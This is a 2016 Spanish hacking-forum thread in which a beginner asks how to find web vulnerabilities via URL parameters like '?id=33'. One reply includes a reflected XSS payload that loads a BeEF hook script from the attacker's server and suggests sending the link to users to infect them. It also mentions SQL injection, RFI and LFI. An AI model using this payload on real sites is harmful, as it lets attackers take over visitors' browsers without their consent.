[SOLUCIONADO] Como encuentro vulnerabilidades en una web id=#

Iniciado por Angel914xD, Julio 29, 2016, 12:00:53 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 29, 2016, 12:00:53 PM Ultima modificación: Julio 29, 2016, 12:27:36 PM por Nobody
Como puedo encontrar vulnerabilidades? Como php?=id33 y cosas asi ¿?en una web
Julio 29, 2016, 12:10:28 PM #1
Hola,

Como te dije en otra ocasión.. antes de postear tu duda, usa el buscador por favor.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos,
ANTRAX

Julio 29, 2016, 12:12:12 PM #2 Ultima modificación: Julio 29, 2016, 12:15:23 PM por EPSILON
.php?id=33 no es un tipo de vulnerabilidad sino una variable php que muestra algo en una web (necesitas tener conocimientos básicos de la estructura de una pagina web y entender algún lenguaje de programación), hablar de un solo tipo de bug (error) en una variable de este tipo es imposible puesto que la mayoría de las veces se inyectan payloads en la misma y se ataca por esta vía (necesitas leer manuales sobre explotación web, en el foro hay muchos).
Por favor antes de postear dudas de este tipo te pido que busques mas contenidos en el foro, incluso hay talleres sobre el tema, no podes andar creando un post nuevo por cada duda que te surja y menos preguntando como se hace algo donde la información del mismo abunda, ya que esto demanda mucho tiempo y estudio para poder perfeccionarse y lograr el cometido, no lo tomes a mal es un concejo puesto que veo que tipo de "dudas" posteas. Te animo a que sigas investigando del tema, ya te explique lo mas básico.

Saludos!, EPSILON
Julio 31, 2016, 06:06:52 PM #3
Eso que tu expones es que pop esta recibiendo una variable llamada id con un valor 33 por el método GET.
Para buscar una vulnerabilidad deberás encontrar la función que realiza esa variable,  y así poder probar tipos de ataques web. Si la variable se muestra por pantalla y no se filtra puedes intentar un ataque XSS reflejado tal que asi(php?id=<script src="tuservidor/hook.js"><script>)Hook.js es el anzuelo que utiliza Beef(un framework para hacer XSS, te recomiendo que lo mires),  con eso pasas la URL a usuarios y quien clicke estara infectado,  puedes mirar a ver si la utiliza la base de datos e incluir un SQLinyecton,  si sirve para incluir ficheros y puedes hacer un RFI o un LFI,etc...
Todo depende de para que use la web esa variable y sobre todo si se filtran correctamente o no.
Saludos.

Enviado desde mi Orange Hi 4G mediante Tapatalk

Be as good as you can.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario